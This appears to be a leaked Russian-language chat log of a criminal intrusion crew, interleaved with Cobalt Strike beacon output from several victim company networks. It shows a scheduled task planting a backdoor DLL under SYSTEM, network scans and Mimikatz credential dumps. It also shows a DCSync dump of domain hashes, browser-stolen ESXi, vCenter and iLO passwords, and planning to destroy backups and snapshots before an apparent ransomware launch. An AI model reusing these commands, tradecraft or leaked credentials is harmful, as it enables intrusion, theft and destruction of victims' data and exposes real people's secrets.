SystemSoundsService Disabled

Folder: \Microsoft\Windows\NetTrace
TaskName Next Run Time Status
======================================== ====================== ===============
GatherNetworkInfo N/A Ready

Folder: \Microsoft\Windows\PLA
TaskName Next Run Time Status
======================================== ====================== ===============
Server Manager Performance Monitor Disabled

Folder: \Microsoft\Windows\Power Efficiency Diagnostics
TaskName Next Run Time Status
======================================== ====================== ===============
AnalyzeSystem 12/29/2020 10:09:27 AM Ready

Folder: \Microsoft\Windows\RAC
TaskName Next Run Time Status
======================================== ====================== ===============
RacTask 12/21/2020 1:08:29 PM Ready

Folder: \Microsoft\Windows\Ras
TaskName Next Run Time Status
======================================== ====================== ===============
MobilityManager N/A Ready

Folder: \Microsoft\Windows\Registry
TaskName Next Run Time Status
======================================== ====================== ===============
RegIdleBackup 12/23/2020 12:22:55 AM Ready

Folder: \Microsoft\Windows\Server Manager
TaskName Next Run Time Status
======================================== ====================== ===============
CleanupOldPerfLogs N/A Ready
ServerManager N/A Ready

Folder: \Microsoft\Windows\SoftwareProtectionPlatform
TaskName Next Run Time Status
======================================== ====================== ===============
SvcRestartTask 12/21/2020 8:51:55 PM Ready

Folder: \Microsoft\Windows\Task Manager
TaskName Next Run Time Status
======================================== ====================== ===============
Daily Transformer Cube Builds Disabled
Interactive N/A Ready

Folder: \Microsoft\Windows\Tcpip
TaskName Next Run Time Status
======================================== ====================== ===============
IpAddressConflict1 N/A Ready
IpAddressConflict2 N/A Ready

Folder: \Microsoft\Windows\TextServicesFramework
TaskName Next Run Time Status
======================================== ====================== ===============
MsCtfMonitor N/A Ready

Folder: \Microsoft\Windows\Time Synchronization
TaskName Next Run Time Status
======================================== ====================== ===============
SynchronizeTime 12/27/2020 1:00:00 AM Ready

Folder: \Microsoft\Windows\UPnP
TaskName Next Run Time Status
======================================== ====================== ===============
UPnPHostConfig N/A Ready

Folder: \Microsoft\Windows\User Profile Service
TaskName Next Run Time Status
======================================== ====================== ===============
HiveUploadTask Disabled

Folder: \Microsoft\Windows\WDI
TaskName Next Run Time Status
======================================== ====================== ===============
ResolutionHost N/A Ready

Folder: \Microsoft\Windows\Windows Error Reporting
TaskName Next Run Time Status
======================================== ====================== ===============
QueueReporting N/A Ready

Folder: \Microsoft\Windows\Windows Filtering Platform
TaskName Next Run Time Status
======================================== ====================== ===============
BfeOnServiceStartTypeChange N/A Ready

Folder: \Microsoft\Windows\WindowsColorSystem
TaskName Next Run Time Status
======================================== ====================== ===============
Calibration Loader Disabled

Folder: \Microsoft\Windows\Wininet
TaskName Next Run Time Status
======================================== ====================== ===============
CacheTask N/A Ready

Folder: \OfficeSoftwareProtectionPlatform
TaskName Next Run Time Status
======================================== ====================== ===============
SvcRestartTask 12/21/2020 11:19:45 PM Ready

Folder: \Scheduled Server Reboots
TaskName Next Run Time Status
======================================== ====================== ===============
Reboot (on demand) N/A Ready
Scheduled Server Reboot 12/27/2020 9:45:00 PM Ready

Folder: \Symantec Endpoint Protection
TaskName Next Run Time Status
======================================== ====================== ===============
Symantec Endpoint Protection Error Analy N/A Ready
Symantec Endpoint Protection Error Proce 12/22/2020 2:47:08 AM Could not start

```покажи мне уже блядский штаск на той машине)НЕЛЬЗЯнельзя более одного раза запускатьты чуть не наебнул системууже дохуя раз сказал1 длл = 1 запускбоже блятькак ты и сказалдлку[ ](https://mediaeveryone.com/group/korbel-com?msg=BLQrQThiQ9uSkH3W9) ???запускаю штаскомскажи чточто ты блять делаешьминуту``
beacon> shell SCHTASKS /Create /u KORBEL\daniel.harvey_adm /p W3lcome? /tn "Microsoft autoupdate#98189" /tr "cmd.exe /c rundll32 c:\windows\system32\ds64gt.dll entryPoint" /sc onstart /RU SYSTEM
[*] Tasked beacon to run: SCHTASKS /Create /u KORBEL\daniel.harvey_adm /p W3lcome? /tn "Microsoft autoupdate#98189" /tr "cmd.exe /c rundll32 c:\windows\system32\ds64gt.dll entryPoint" /sc onstart /RU SYSTEM
[+] host called home, sent: 211 bytes
[+] received output:
ERROR: Invalid syntax. Cannot specify user name without specifying system name.
Type "SCHTASKS /?" for usage.

```кукукакие 15 минут?чет нихера не быстро)исправляй рещекосякэто косяк(вот что за хуйняа, бля...смотри schtasks /queryты запустил штаском?ТАМ ПРЯЧЕТСЯ В СИСТЕМ32 И ЗАПУСКАЕТСЯ ИЗ ПОД СИСТЕМ ПРАВты запускаешь на сервереты блять ДАвот что за хуйня,kznm что это?Запустил, проверяй
```
C:\Users\cognos\AppData\Local\Adobe\Acrobat\10.0\AdobeSysFnt01.dll
``x64сейчас дам дллшикарно, прыжок на сервак, и бекдор туда)малорик)ДА
```
	 * Username : daniel.harvey_adm
	 * Domain : KORBEL
	 * Password : W3lcome?

	 * Username : adaudit
	 * Domain : korbel
	 * Password : #aud1T#

	 * Username : ben.mandeville
	 * Domain : KORBEL
	 * Password : 1234qwerASDF!@#$
``шары смотри сразу
мб текущий пользак куда уметрастов нет``
The request will be processed at a domain controller for domain korbel.com.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
adaudit agpm_admin barry.levine_adm
ben.mandeville_adm carol.macdonell_adm
daniel.harvey daniel.harvey_adm dcbackup
Honcho Jcomfort josue.gonzalez
josue.gonzalez_adm kbveeamadmin KB-WMI-Monitor
panuserID Russell.Bartson_adm SMSadmin
SMTP-Relay solarwindows SolarWinds-LDAP
sqlbackup switchscan tracy.mcmahan_adm
vcentersvc veeamadmin
The command completed successfully.


[+] received output:
The request will be processed at a domain controller for domain korbel.com.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
adaudit carol.macdonell_adm daniel.harvey_adm
Honcho josue.gonzalez_adm Russell.Bartson_adm
SMSadmin SMTP-Relay sqlbackup
vcentersvc
The command completed successfully.


[+] received output:
The request will be processed at a domain controller for domain korbel.com.

Alias name administrators
Comment Members can fully administer the computer/domain

Members

-------------------------------------------------------------------------------
carol.macdonell
ContentSubmitters
Domain Admins
Enterprise Admins
Honcho
josue.gonzalez
SMTP Relay
Tmcmahan
tracy.mcmahan_adm
The command completed successfully.

```дая помогать пошел окда?пока оставь дамне дальше есть что колупать или идти помогать?говорю же просто живыевот всё``
beacon> portscan 10.1.10.0/16 445 icmp 1024
[*] Tasked beacon to scan ports 445 on 10.1.10.0/16
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.1.10.20' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.1' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.11' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '10.1.10.59' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '10.1.10.100' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.103' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.104' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '10.1.10.210' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '10.1.10.251' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.240' is alive. [read 8 bytes]
(ICMP) Target '10.1.10.250' is alive. [read 8 bytes]
``портскан по /16 маскеокей тупой вопрос - как?
в офисе никто ответа не далпроверь есть ли воркгупы рядомну они чисто живи под 16 и всеу нас была 2416 маскучто?чет вчера такого не помнюдаicmp?поставить порт скан на /16 маскувон дцсинквон рассканмне что делать сейчас``

[i] Some weird software? Check for vulnerabilities in unknow software installed
  [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software
7-Zip
Common Files
Common Files
Internet Explorer
Internet Explorer
Microsoft Office
Microsoft Office 15
Microsoft.NET
ModifiableWindowsApps
ossec-agent
Teams Installer
UNP
Velociraptor
Windows Defender
Windows Defender
Windows Defender Advanced Threat Protection
Windows Mail
Windows Mail
Windows Media Player
Windows Media Player
Windows Multimedia Platform
Windows Multimedia Platform
Windows NT
Windows NT
Windows Photo Viewer
Windows Photo Viewer
Windows Portable Devices
Windows Portable Devices
Windows Security
WindowsPowerShell
WindowsPowerShell
    InstallLocation REG_SZ C:\Program Files\7-Zip\
    InstallLocation REG_SZ C:\Program Files (x86)\Microsoft Office

```запустил и потом вспомнил, что там хрома то и нетшарпвеб кстати не снимет вроде Хром к сожалению
хром через шарпхром или мимиком надоещё до дкя делалэто без[ ](https://mediaeveryone.com/group/northerntrust-local?msg=GyqZZyrCNNsa7vude) ```
10.1.10.11:445 (platform: 500 version: 10.0 name: LENDING3 domain: NORTHERNTRUST)
10.1.10.20:445 (platform: 500 version: 10.0 name: FILE1 domain: NORTHERNTRUST)
10.1.10.59:445 (platform: 500 version: 10.0 name: ACC1 domain: NORTHERNTRUST)
10.1.10.100:445 (platform: 500 version: 10.0 name: HR1 domain: NORTHERNTRUST)
10.1.10.103:445 (platform: 500 version: 10.0 name: IT1 domain: NORTHERNTRUST)
10.1.10.104:445 (platform: 500 version: 10.0 name: LENDING1 domain: NORTHERNTRUST)
10.1.10.210:445 (platform: 500 version: 10.0 name: AUTOMATE1 domain: NORTHERNTRUST)
10.1.10.240:445 (platform: 500 version: 6.3 name: BACKUP1 domain: NORTHERNTRUST)
10.1.10.250:445 (platform: 500 version: 6.3 name: DC1 domain: NORTHERNTRUST)
10.1.10.251:445 (platform: 500 version: 10.0 name: DC3 domain: NORTHERNTRUST)
``````
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:


=== Chrome (All Users) ===



=== Checking for Firefox (All Users) ===



=== Checking Windows Vaults ===


```а дай дамп браузера с пк откуда начално без `icmp 1024`у меня есть портскан короче по 445у всех?там одна подсеть 10.1.10.0вспомниай)по 443 как вчера?делай рассканну у тебя трастдампа я не вижутак, теперь разбор нетворка, получается?
Вот из ад_комп все серваки
```
DC1.Northerntrust.local
DC3.Northerntrust.local
Automate1.Northerntrust.local
Backup1.Northerntrust.local
File1.Northerntrust.local
``[ ](https://mediaeveryone.com/group/northerntrust-local?msg=Z759CRfjaC2xtFvXv) делал как знаюофкбрутил?)``
'.\Administrator:Abcd1234!' Administrator
```у меня есть ДАя получил сессию на ДК@tl1 еуна``
[DC] 'Northerntrust.local' will be the domain
[DC] 'DC1.Northerntrust.local' will be the DC server
[DC] Exporting domain 'Northerntrust.local'
502 krbtgt 3dbe670716ca04f747c58e2410985c37 514
2107 rperkins 25c1c24f244b4b38ddd008f5e5e04dc5 512
2109 darmstrong dcd25a439cd39daa6baeb6c02e88a9e6 512
2110 pgardner 1b638783b0af77e01bcb54fac1c9e938 512
2113 vlane ae67ca4ce0dd712cf628575c9439651d 512
2114 jwalsh 0ea6bede65067837ca818ac7381b9ac9 512
2116 lbrewer e04b29f420b76b1de7405d42db33296e 512
2123 PRINTER1$ d71638bf9374e98d9bedc6b6c32de6fb 4128
2124 PRINTER2$ 9b3c84a8ab5f5e10fa062bb7b89dc3f0 4128
2125 HR3$ a88292f68cd62e0dff57c5edbdfad160 4128
2128 IT2$ 51de61363b4c3e0c3bc9dbf394b834ee 4128
2129 IT3$ eeb1b544374ad054be4c3a37f2409f46 4128
2132 security 55e9dd76e1b4c8cdef934988600ad2b4 66048
2133 MARKET1$ 78690dbb6c0526d278300c76bdf40c6d 4128
2134 MARKET2$ 5c6a44e156b5633fbc5822ce8cc3bfa9 4128
2135 MARKET3$ cd4a3826128079306a570a83fb359318 4128
2122 networkservices 774ec9de93bc164d7e7dd3f7022b9ddf 66048
2106 spayne ec4408935ee4d46b9c4093947015c410 512
2136 srivers c4b0e1b10c7ce2c4723b4e2407ef81a2 512
2137 boniel 33a09024bd0389b1ced865a291d0199c 512
2104 ghawkins acbfc03df96e93cf7294a01a6abbda33 66048
2138 LENDING4$ 6c13631c0d6b31fd187f4711fe223620 4096
1105 AUTOMATE1$ 82d4822fd7edb2932db2525042d23ad6 4096
1104 DC3$ 0d24da494b1f4f15f4e6a79444e70f90 532480
1106 HR1$ 3c3ed7115e70468341b2f545d5d44639 4096
1109 LENDING1$ a934860dbc89364c28c4d2ada48dc792 4096
2102 IT1$ 6db2362e97d455705f3fdd235382ee14 4096
1107 ACC1$ 0d944ee41ec7b7fb57e41811519010d7 4096
2130 FILE1$ a488233c032861f97e34ba50b73b99fd 4096
1001 DC1$ 54c071b65d14c02a3f3ffc638b16c8b5 532480
1108 BACKUP1$ 2e2060b3b2eb7a0b61dcbf918ee498ac 4096
2127 LENDING3$ 102434085c8a288797aec02654f619e3 4128
2126 LENDING2$ 3c507247472925acf99b8c1fe532a645 4128
2105 ehart cef2eb521883d390b32b0b5bb916f7bb 66048
500 Administrator e20e81c5c06ccf288474c581f13423b9 512
2103 rbradley 64f12cddaa88057e06a81b54e73b949b 66048
3602 fgarbo 1d32ad40cecbc0419f99a08e0845dd66 66048
```вас 6 человек, гайды все естьладно, делай как знаешь)я понял, в параметре hostlist?в шарфайндерев хост-листе то?указание дк?или...?не по хостлисту же пускатьв исходниках есть параметр, но с ним не отработало такжеи посмотри гит, мб там есть параметр прямого указания домена``
beacon> psinject 1636 x64 Invoke-ShareFinder -Domain Northerntrust.local | Out-File sharfindINFO.txt
[*] Tasked beacon to psinject: Invoke-ShareFinder -Domain Northerntrust.local | Out-File sharfindINFO.txt into 1636 (x64)
[+] host called home, sent: 133723 bytes
[+] received output:
ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or
ERROR: could not be contacted.
ERROR: "
ERROR: At line:849 char:9
ERROR: + $CompSearcher.FindAll() | ForEach-Object {
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : COMException
ERROR:
WARNING:
[!] No hosts found!

``аргументов не хватает``
beacon> psinject 1636 x64 Invoke-ShareFinder | Out-File sharfindINFO.txt
```кая команда былаговорит хзпо этой ошибке не спросилу тл какие ответы на месте``
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
Northerntrust.local
``проверь домен, мб отключилиот домена не отрублен вродеShareFinder запустил, выкатило это, я так понимаю там нет шар :thinking:
```
[*] Tasked beacon to remove C:\Windows\Temp\wpinfo
[+] received output:
ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or
ERROR: could not be contacted.
ERROR: "
ERROR: At line:849 char:9
ERROR: + $CompSearcher.FindAll() | ForEach-Object {
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : COMException
ERROR:
WARNING:
[!] No hosts found!
```у вас вообще все)у вас гайды, у вас форум, у вас mindmapа когда у него идеи кончатся уже ко мнесамое время спросить у тимлида своего)брут? а? а? а?у меня идеи кончилисьдиск D нашёл, не открываетсяШуТкУю ПрИкОлЫне понялну не штаском жеад? ты же его уже сняли так есть с чем работатьокей делаю токен снимаю адда тут и брутить не надовсе имет смысл пока нет ДАокей локальных пользователей плюсом в брут закинуть будет иметь смысл?ну хд я после сделалвыше написалкак не упало кредов кроме текущего пользака то?[ ](https://mediaeveryone.com/group/northerntrust-local?msg=swYfpm9XBJ7NGMKpu) ?скорее всего системные аккитак это локальные пользователиих в ад_юзерс нет :thinking:+одинаковые пароли``
OOB:1003:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::
setup:1001:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::
``````
setup:1001:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::Abcd1234!
``````
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
OOB:1003:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::
setup:1001:aad3b435b51404eeaad3b435b51404ee:e20e81c5c06ccf288474c581f13423b9:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ae49429db3a99d5b0af02187c1873deb:::

```нужна подсказка по векторам, мне никаких кредов упало кроме нтлм хэша текущего пользователя, он на своей тачке ЛА, но там мало полезного
его машина состоит в OU=Lending
есть ещё такие тачки, имет смысл пингануть их и брутануть на предмет ЛА?``
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 DC1 10.1.10.250
 DC3 10.1.10.251
``````
Authentication Id : 0 ; 49752863 (000000:02f72b1f)
Session : Interactive from 2
User Name : fgarbo
Domain : NORTHERNTRUST
Logon Server : DC1
Logon Time : 10/3/2020 9:56:59 AM
SID : S-1-5-21-1968562247-2146563082-3767082923-3602
	msv :
	 [00000003] Primary
	 * Username : fgarbo
	 * Domain : NORTHERNTRUST
	 * NTLM : 1d32ad40cecbc0419f99a08e0845dd66
	 * SHA1 : eeb76229fed887393f7880b224edf87683e69dd3
	 * DPAPI: 532039ed13c7c6b6d3b3986a446888e4
	tspkg:
	wdigest:
	 * Username : fgarbo
	 * Domain : NORTHERNTRUST
	 * Password : (null)
	kerberos :
	 * Username : fgarbo
	 * Domain : NORTHERNTRUST.LOCAL
	 * Password : (null)
	ssp :
	credman:

Authentication Id: 0; 49752778 (000000:02f72aca)
Session : Interactive from 2
User Name : fgarbo
Domain : NORTHERNTRUST
Logon Server : DC1
Logon Time : 10/3/2020 9:56:59 AM
SID : S-1-5-21-1968562247-2146563082-3767082923-3602
	msv :
	 [00000003] Primary
	 * Username : fgarbo
	 * Domain : NORTHERNTRUST
	 * NTLM : 1d32ad40cecbc0419f99a08e0845dd66
	 * SHA1 : eeb76229fed887393f7880b224edf87683e69dd3
	 * DPAPI: 532039ed13c7c6b6d3b3986a446888e4
	tspkg:
	wdigest:
	 * Username : fgarbo
	 * Domain : NORTHERNTRUST
	 * Password : (null)
	kerberos :
	 * Username : fgarbo
	 * Domain : NORTHERNTRUST.LOCAL
	 * Password : (null)
	ssp :
	credman:

Authentication Id: 0; 49665170 (000000:02f5d492)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/3/2020 9:56:39 AM
SID : S-1-5-90-0-2
	SV :
	 [00000003] Primary
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * NTLM : 102434085c8a288797aec02654f619e3
	 * SHA1 : ce51afe3ab35b5e630f28da5f0f36a507b30e2bf
	tspkg:
	wdigest:
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * Password : (null)
	kerberos :
	 * Username : LENDING3$
	 * Domain : Northerntrust.local
	 * Password : Y*]ozx%Vn)_$N%@t0+9SfI[##r8_XVQFz<67Q<[,s*zd9kQDG<Yi P+Rr%]S -mSwUlw.!]M1+@e6fC_46 "ijP3h u':E1$/?(DdI BiZfQb0Z;#qg L0^_*
	ssp :
	credman :

Authentication Id : 0 ; 49665147 (000000:02f5d47b)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 10/3/2020 9:56:39 AM
SID : S-1-5-90-0-2
	SV :
	 [00000003] Primary
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * NTLM : 102434085c8a288797aec02654f619e3
	 * SHA1 : ce51afe3ab35b5e630f28da5f0f36a507b30e2bf
	tspkg:
	wdigest:
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * Password : (null)
	kerberos :
	 * Username : LENDING3$
	 * Domain : Northerntrust.local
	 * Password : Y*]ozx%Vn)_$N%@t0+9SfI[##r8_XVQFz<67Q<[,s*zd9kQDG<Yi P+Rr%]S -mSwUlw.!]M1+@e6fC_46 "ijP3h u':E1$/?(DdI BiZfQb0Z;#qg L0^_*
	ssp :
	credman :

Authentication Id: 0; 49661033 (000000:02f5c469)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 10/3/2020 9:56:39 AM
SID : S-1-5-96-0-2
	msv :
	 [00000003] Primary
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * NTLM : 102434085c8a288797aec02654f619e3
	 * SHA1 : ce51afe3ab35b5e630f28da5f0f36a507b30e2bf
	tspkg:
	wdigest:
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * Password : (null)
	kerberos :
	 * Username : LENDING3$
	 * Domain : Northerntrust.local
	 * Password : Y*]ozx%Vn)_$N%@t0+9SfI[##r8_XVQFz<67Q<[,s*zd9kQDG<Yi P+Rr%]S -mSwUlw.!]M1+@e6fC_46 "ijP3h u':E1$/?(DdI BiZfQb0Z;#qg L0^_*
	ssp :
	credman :

Authentication Id: 0; 48011904 (000000:02dc9a80)
Session : Interactive from 1
User Name : ehart
Domain : NORTHERNTRUST
Logon Server : DC1
Logon Time : 10/3/2020 9:53:49 AM
SID : S-1-5-21-1968562247-2146563082-3767082923-2105
	SV:
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id: 0; 48011793 (000000:02dc9a11)
Session : Interactive from 1
User Name : ehart
Domain : NORTHERNTRUST
Logon Server : DC1
Logon Time : 10/3/2020 9:53:49 AM
SID : S-1-5-21-1968562247-2146563082-3767082923-2105
	SV:
	tspkg :
	wdigest :
	kerberos :
	ssp :
	credman :

Authentication Id: 0; 997 (000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 9/30/2020 10:27:35 AM
SID : S-1-5-19
	SV :
	tspkg:
	wdigest :
	 * Username : (null)
	 * Domain : (null)
	 * Password : (null)
	kerberos :
	 * Username : (null)
	 * Domain : (null)
	 * Password : (null)
	ssp :
	credman:

Authentication Id: 0; 996 (000000:000003e4)
Session : Service from 0
User Name : LENDING3$
Domain : NORTHERNTRUST
Logon Server : (null)
Logon Time : 9/30/2020 10:27:33 AM
SID : S-1-5-20
	SV :
	 [00000003] Primary
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * NTLM : 102434085c8a288797aec02654f619e3
	 * SHA1 : ce51afe3ab35b5e630f28da5f0f36a507b30e2bf
	tspkg:
	wdigest:
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * Password : (null)
	kerberos :
	 * Username : lending3$
	 * Domain : NORTHERNTRUST.LOCAL
	 * Password : (null)
	ssp :
	credman:

Authentication Id: 0; 32821 (000000:00008035)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 9/30/2020 10:27:32 AM
SID : S-1-5-96-0-0
	SV :
	 [00000003] Primary
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * NTLM : 102434085c8a288797aec02654f619e3
	 * SHA1 : ce51afe3ab35b5e630f28da5f0f36a507b30e2bf
	tspkg:
	wdigest:
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * Password : (null)
	kerberos :
	 * Username : LENDING3$
	 * Domain : Northerntrust.local
	 * Password : Y*]ozx%Vn)_$N%@t0+9SfI[##r8_XVQFz<67Q<[,s*zd9kQDG<Yi P+Rr%]S -mSwUlw.!]M1+@e6fC_46 "ijP3h u':E1$/?(DdI BiZfQb0Z;#qg L0^_*
	ssp :
	credman :

Authentication Id: 0; 31218 (000000:000079f2)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 9/30/2020 10:27:31 AM
SID :
	MVS:
	 [00000003] Primary
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * NTLM : 102434085c8a288797aec02654f619e3
	 * SHA1 : ce51afe3ab35b5e630f28da5f0f36a507b30e2bf
	tspkg:
	wdigest:
	kerberos:
	ssp :
	credman:

Authentication Id: 0; 999 (000000:000003e7)
Session : UndefinedLogonType from 0
User Name : LENDING3$
Domain : NORTHERNTRUST
Logon Server : (null)
Logon Time : 9/30/2020 10:27:31 AM
SID : S-1-5-18
	SV :
	tspkg:
	wdigest :
	 * Username : LENDING3$
	 * Domain : NORTHERNTRUST
	 * Password : (null)
	kerberos :
	 * Username : lending3$
	 * Domain : NORTHERNTRUST.LOCAL
	 * Password : (null)
	ssp :
	credman:
``````
The request will be processed at a domain controller for domain Northerntrust.local.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator ehart ghawkins
network services rbradley spayne
The command completed successfully.

The request will be processed at a domain controller for domain Northerntrust.local.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator ehart ghawkins
network services rbradley spayne
The command completed successfully.

Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
NORTHERNTRUST\Domain Admins
NORTHERNTRUST\fgarbo
OOB
setup
The command completed successfully.


````\\192.168.168.5\swshare`Чекаю систему на наличие кред. Найденные не действительны. Чекнул на ms17 пусто.DA
```
	 * Username : Administrator
	 * NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0 нулевой


	 * Username : Linux
	 * NTLM : c40ce4eab245d09bead615fd67e59a77 неверный ХЭШ
	 * Password : Pack5156
``````
User name linux
Full Name Linux
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 6/12/2014 11:20:21 AM
Password expires Never
Password changeable 6/13/2014 11:20:21 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/16/2020 2:06:23 PM

Logon hours allowed All

Local Group Memberships *Administrators
Global Group memberships *Group Policy Creator *Domain Admins
                             *Enterprise Admins *Domain Users
                             *Schema Admins
The command completed successfully.

``user3pkgprod.comи мапитьможете уже притягивать все серверачерез 10 мин начинаемнюансы повторилбилд выдалну всебэкапы, насы и файловые хранилища в первую очередьна сервера мапим армыднсы и дк в самую последню очередьага ну тогда в снослиньвин или линь диск?а где снапы лежат?да, все куак всегдакстатину по классике знаете да?через 10 мин начинемоквторую оставим для второй сетит к серверов всего 67берем 1 кобу в работуокейэто дану пасса то небыло)
до того как браузер снялитогда что сложного? :Dнет логинатам вообще только пасс ахах())нетугадал?root/admin/доменное имя``
--- Chromium Credential (User: mattpeterson) ---
URL : https://z1trendmicro.gophersport.local:4343/SMB/console/html/cgi/cgiChkMasterPwd.exe
Username :
Password : Pr0stretch
```2 кобу берем под работуну не сказал бы)говорят вы вдвоем справитесь?ну админка ав на поверхности былада, вцентр нашли
есиксы тоже нашли
админку ав нашли`POIODJFUIHGYSDIUfG*YSgfyewi76GSFTSYTEgjuf`вы готовы? проверили наличие снапов и т д?15 мин``
http://z1trendmicro.gophersport.local:8059/SMB/console/html/cgi/cgiChkMasterPwd.exe
Pr0stretch
```через 50 мин начинаемпо ад67/312ок, жду стату)давай я открою все что откроется и напишу, а то опять запутаюсь)по ада сколько серверов и армов?не. в браузерене говори что в кобу тянешь...я часть по ип открывал, а часть по именам и хер разбери одна это или разныепереоткрываешь..?я щас переоткрываю заново, а то запутался)вопрос в том что за виртуалки?ну мало всмысле их штук 10сколько серверов и армовтак и сеть небольшая?виртуалок как то мало...через час начнем?не похоже что относитсяадминка proliant это же к сфере не относится?из тех что не подошличасть вроде не настроена4 подошловсего 9 линейподошел хоть 1 или все зря?проверяем кредывы хоть признак жизни подайте``
--- Chromium Credential (User: mattpeterson) ---
URL : https://z2dc1esxi2.gophersport.local/ui/
Username : root
Password : PowerPlay1947
URL : https://z2dc1esxi1.gophersport.local/ui/
Username : root
Password : PowerPlay1947
URL : https://vc-z2dc1.gophersport.local/websso/SAML2/SSO/vsphere.local
Username : administrator@vsphere.local
Password : Victory1947!
URL : https://z2dc1esxi3.gophersport.local/ui/
Username : root
Password : PowerPlay1947
URL : https://z1esxi1-ilo.gophersport.local/html/login.html
Username : admin
Password : Genesis1947
``как раз финальная проверкау нас в запасе еще 2 часадатут дальше вы сами справитесь думаю?все4 из 6``
--- Chromium Credential (User: mattpeterson) ---
URL : https://z1esxi1.gophersport.local/ui/
Username : GOPHERSPORT\mattpeterson
Password : A101011a45!

``может, ее по моему и дк нет?``
--- Chromium Credential (User: mattpeterson) ---
URL : https://vc-z2dc1.gophersport.local:5480/
Username : root
Password : SuperNova1947!
``````--- Chromium Credential (User: mattpeterson) ---
URL : https://ilo2m24422ldx.gophersport.local/html/login.html
Username: admin
Password : Genesis1947``отсюда, возможно, как тоадминятся все сферыи еще остальные сразу в копилку``
URL : https://vc-z2dc1.gophersport.local/websso/SAML2/SSO/vsphere.local
Username : gophersport\mattpeterson
Password : A101011a43
```@user4 твой выходкрасавчик)да быстрее же))))снял шарпхромиумопросто /unprotect из его процессакстати точноможет щас выдрешь его мастеркейпо дпапи пробегись)@user9 раз мы на его тачкепотом логонпасситбелтсначала браузерыможет там его клир вплыветиз систем можно винлогон и снять логонпассили отвалится без возможности переподнятьданет, но он снимался
тоже из под контекста
а ситбел от систтемы я думла тебе нужен чтобы истоию посмотреть пользкаов и тдв общем реще работаемшарпвеб был у васты им снял у себя локально?а, чтобы креды снять
я думал sharpchromium ом их снятьтам же прикол с дпапииз его контекста снимать надо...да, это понятнот к там вайтилсьне инжектить обычный хттпесли чтосесию выделил зеленымв общем в темпея бы сходу снял ситбелтэто биндпайп тут по другому его не поставитья даже не пытался джампом туда пргыгать т.к. он нигде не работалможно в окно прыгаптьебаште его)в кобе блятьне пробовали вы биндпайпы пробовали к нему пускать?но я починил пшэто при запросе в тпш``
Exception calling "DownloadString" with "1" argument(s): "The remote server returned an error: (403) Forbidden."

